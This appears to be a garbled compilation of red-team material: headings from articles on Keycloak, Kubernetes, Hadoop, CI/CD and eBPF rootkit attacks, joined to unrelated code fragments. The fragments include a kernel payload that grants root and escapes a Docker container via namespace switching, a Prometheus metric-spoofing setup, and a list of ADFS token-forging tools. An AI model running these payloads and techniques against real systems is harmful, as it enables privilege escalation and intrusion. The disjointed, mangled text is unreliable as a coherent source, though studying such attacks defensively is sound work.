* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Denoscriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration

Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion

Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* email
* address
* phone

* passwords
* history
* cookies
* bookmarks
* download history
* localStorage
* extensions

* Complications of talking about Kubernetes security
* Managed and unmanaged Kubernetes distributions
* Areas of discussion

* Kubernetes components and ports
- Unmanaged Kubernetes
- Managed Kubernetes
* Securing Kubernetes APIs

* Kubernetes authentication principles
- Internal Kubernetes authentication methods
- Static token authentication
- Bootstrap tokens
- X.509 client certificates
- Service account tokens
* External authentication methods
- OpenID Connect (OIDC)
- Webhook token authentication
- Authenticating proxy
- Impersonating proxy
* Authentication for other Kubernetes components
- Kubelet
- Controller manager and scheduler
- Kube-proxy
- Etcd

* Kubernetes authorization principles
* Kubernetes authorization modules
- AlwaysAllow and AlwaysDeny
- Node Authorizer
- ABAC
- RBAC
- Webhook
* Authorization for other Kubernetes components
- Kubelet
- Scheduler and Controller Manager

* Admission control overview
- Internal admission controllers
- External admission controllers
* Risks of implementing external admission control
- Using admission control for pod security

* Network trust zones
* Introduction to CNI
* Managing network access in Kubernetes
* Securing the cluster network
* Conclusion
* Appendix - Setting up a demonstration environment

* Tools, Techniques and Procedures to attack an Hadoop environment

* Key vulnerabilities on Hadoop components (Hadoop Common, HDFS, YARN etc.)

* Key vulnerabilities in third-party components often used in Hadoop environments

* Authenticate using Keytab
* Impersonate Another Hadoop Service
* HDFS Command Cheat Sheet
* RCE

* A Python noscript that parses Nmap XML output and stores the data in an SQLite database.

* A Grafana Docker container with a pre-configured dashboard for visualizing the Nmap scan data.

void get_root_payload( void) {

        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );

        // -------- NAMESPACE DOCKER EXPLOIT  --------
        // copy nsproxy from init_nsproxy to pid 1 of the container
        unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);

        // now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
        ((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

        // prepare the two namespace FDs by opening the respective files
        long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);

        fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);
}

CVE-2025-24514 - auth-url Annotation Injection
CVE-2025-1097 - auth-tls-match-cn Annotation Injection
CVE-2025-1098 - mirror UID Injection
CVE-2025-1974 - NGINX Configuration Code Execution

* A Standard Poisoned Pipeline

* Shared Docker-in-Docker Runners and Privileged Containers

* The Shared Instance-Level Runner

* Attacking Docker-in-Docker Shared Runners

* Remediation - Hardening the CI/CD Infra

* Shell Executors

* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection

* Бекдор через отправку парольной фразы в tcp пакете

* Сокрытие pid'а процесса (этот функционал взят из bad-bpf, но загрузчик переписан на Go)

* Persistence
* Resources hiding
* Bypassing AdmissionControllers

* Read files
* Write files
* Create symbolic links
* C2 server communication

#If u have proto
grpcui -proto service.proto -plaintext grpc-address:50051

#If service have reflection
grpcui -plaintext grpc-address:50051

* Testing via burp
* Using sqlmap & the like
* Supports proxying via proxychains

* Introduction to eBPF
* How are eBPF programs built and loaded?
* Reversing eBPF rootkit

./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code

global:
  scrape_interval: 10s

scrape_configs:
  - job_name: 'redteam'
    metrics_path: /metrics
    static_configs:
      - targets: ['redteam.ru:9100'] # target, который мы хотим подделать

remote_write:
  - url: "http://host:8429/api/v1/write" # сервис, принимающий метрики, например vmagent

import http.server
import socketserver

PORT = 9100
METRICS = """
# HELP cpu_usage Test metric
# TYPE cpu_usage gauge
cpu_usage{job="redteam"} 0.64
""".encode('utf-8')

class MetricsHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/metrics':
            self.send_response(200)
            self.send_header("Content-type", "text/plain; version=0.0.4; charset=utf-8")
            self.end_headers()
            self.wfile.write(METRICS)
        else:
            self.send_response(404)
            self.end_headers()

with socketserver.TCPServer(("", PORT), MetricsHandler) as httpd:
    print("serving metrics at port", PORT)
    httpd.serve_forever()

* ADFSDump - Dump decryption private keys and other sorts of goodies from AD FS

* ADFSpoof - A python tool to forge AD FS security tokens

{
    "status": "success",
        "data": {
            "web.enable-admin-api": "true",
            "web.enable-lifecycle": "false",
        }
}

__meta_gce_metadata_ssh_keys
__meta_gce_metadata_startup_noscript
__meta_gce_metadata_kube_env
_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration